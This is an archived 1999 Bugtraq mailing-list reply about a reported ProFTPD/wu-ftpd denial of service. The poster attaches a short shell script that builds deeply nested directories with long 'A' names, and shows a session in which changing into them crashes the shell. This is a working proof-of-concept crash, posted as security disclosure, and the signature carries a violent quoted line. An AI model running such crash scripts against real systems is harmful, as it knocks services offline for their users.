[9576] in bugtraq
Re: Pro/wuFTPD DoS
daemon@ATHENA.MIT.EDU (Ultor)
Mon Feb 15 01:27:53 1999
Date: Sat, 13 Feb 1999 19:18:15 +0100
Reply-To: Ultor <Ultor@SOWATECH.COM.PL>
From: Ultor <Ultor@SOWATECH.COM.PL>
To: BUGTRAQ@NETSPACE.ORG
To jest wieloczj�ciowa wiadomo�f w formacie MIME.
------=_NextPart_000_01BE5785.9ACDD480
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Hi
> yes,
>=20
> kills patched ProFTPD dead.
>=20
> -----snip-----
>=20
> #!/usr/local/bin/perl
> # ftpd thingy
> # bubba@bubba.org
[CUTED]
=20
> -----snip-----
>
> Ken Williams
> jkwilli2@csc.ncsu.edu
Hmmm i think that the problem here isn't overflow in ProFTPD.
Here is a proof.
first run attached 'sux' to make directories ...
----- snip -------
# pwd
/mnt/
# ./sux
ok now just cd that directories
# cd A*
[CUTED]
# cd A*
ultor:/mnt/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# cd A*
Welcome to Linux 2.0.35.
ultor login:
----- snip -------=20
nice heh :)
Greeetz
-------------------------------------------------------------
"I hack the heads off little girls and put them on my wall"
ULT0R [Ultor@sowatech.com.pl] - NETWORK SECURITY ADVISER
------=_NextPart_000_01BE5785.9ACDD480
Content-Type: application/octet-stream; name="sux"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="sux"
#!/bin/sh
#
# stupid thing which shows overflows in some toolz
#
# Contact: ultor@sowatech.com.pl
STRING=3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA
i=3D0
while [ $i -le 15 ]
do=20
i=3D`expr $i + 1`
mkdir $STRING
cd $STRING
echo DIR MADE $i
done
echo NOW JUST DO $ cd XXXXXX* UNTIL IT CRASH
------=_NextPart_000_01BE5785.9ACDD480--
